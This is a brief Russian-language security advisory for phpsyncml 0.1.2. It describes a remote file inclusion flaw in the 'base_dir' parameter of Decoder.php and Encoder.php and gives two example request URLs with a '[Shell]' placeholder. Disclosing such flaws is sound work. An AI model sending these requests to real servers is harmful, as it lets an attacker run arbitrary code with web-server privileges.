Программа: phpsyncml 0.1.2
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «base_dir» сценариями Decoder.php и Encoder.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
[target]/[path]/wbxml/WBXML/Decoder.php?base_dir=[Shell]
[target]/[path]/wbxml/WBXML/Encoder.php?base_dir=[Shell]
